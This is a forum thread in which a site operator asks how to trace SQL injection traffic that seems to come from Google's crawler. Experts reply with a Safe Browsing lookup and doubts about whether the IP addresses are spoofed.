It is the real google bot, it is originating from google owned IPs.  If I set up a page with SQL injection commands pointing to a destination site, and then had google index my page, it would then try all of the links on my site which included the SQL injection commands.

I know this is google.  The problem is not that google is originating the attack.  The trick is identifying the source page that was originally indexed.
 
LVL 38

Accepted Solution

by: Rich Rumble (earned 500 total points)
ID: 24489708
Try adding your site to the end of this URL
http://www.google.com/safebrowsing/diagnostic?site=
Like this:
http://www.google.com/safebrowsing/diagnostic?site=experts-exchange.com
Google keeps a strict log of when and where google-bot has been, and from my findings the URL above only needs about an hour to be updated, so if my site was crawled, 1hr later it's there. Subdomains however don't show up...
If you think it's not spoofed traffic, write to google; they are helpful and might be able to better track down the issue and how they are leveraged to do this attack. I still think it's spoofed, unless your site is coolabah.com
http://www.google.com/safebrowsing/diagnostic?site=www.coolabah.com which is infested and has been for some time.
-rich
 
LVL 108

Expert Comment

by:Ray Paseur
ID: 24493285
Regarding this: "It is the real google bot, it is originating from google owned IPs..." the IP address is external data and can be faked.  Have you contacted Chris yet?

Best, ~Ray
 
LVL 38

Expert Comment

by:Rich Rumble
ID: 24494773
Was it spoofed? Or was it your IPS picking up on traffic being crawled on some web-pages, and not distributing via the google-bot crawler? Google-bot is a "getter" and not a "putter" (gbot is a receiver, not a sender).
-rich
 

Author Comment

by:vladfriedman
ID: 24497475
Hi Ray.  The IP really can't be faked in our environment, and it is not being faked.
